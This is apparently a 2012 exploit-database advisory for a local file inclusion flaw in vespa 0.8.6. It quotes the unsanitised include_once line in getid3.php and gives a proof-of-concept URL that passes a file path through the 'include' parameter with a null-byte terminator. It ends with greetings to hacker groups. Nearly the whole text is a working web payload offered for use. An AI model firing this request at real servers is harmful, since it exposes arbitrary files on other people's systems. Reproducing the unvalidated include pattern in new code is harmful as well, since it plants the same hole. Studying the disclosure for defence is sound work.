# Exploit Title: [vespa 0.8.6 Local File Inclusion] # Date: [05/02/2012] # Author: [T0x!c] # Software Link: [http://vespa.willinger.cc/] # Version: [vespa 0.8.6] # Tested on: [Windows XP] ::::::::::::::::::::::::: =================Exploit================= -=[ vuln c0de ]=- /vespa/getid3/getid3.php 363 // include module 364 include_once(GETID3_INCLUDEPATH.$determined_format['include']); ----exploit---- POC : http://[ Address ]/[ Path ]/getid3/getid3.php?include=[LFI]%00 ================================greatz================================================ Greatz to : * KedAns-Dz * Caddy-Dz * Kha&miX * Ev!LsCr!pT_Dz * KinG Of PiraTeS * Kalashinkov and ALL Akgerian Hackers EnJoY o_O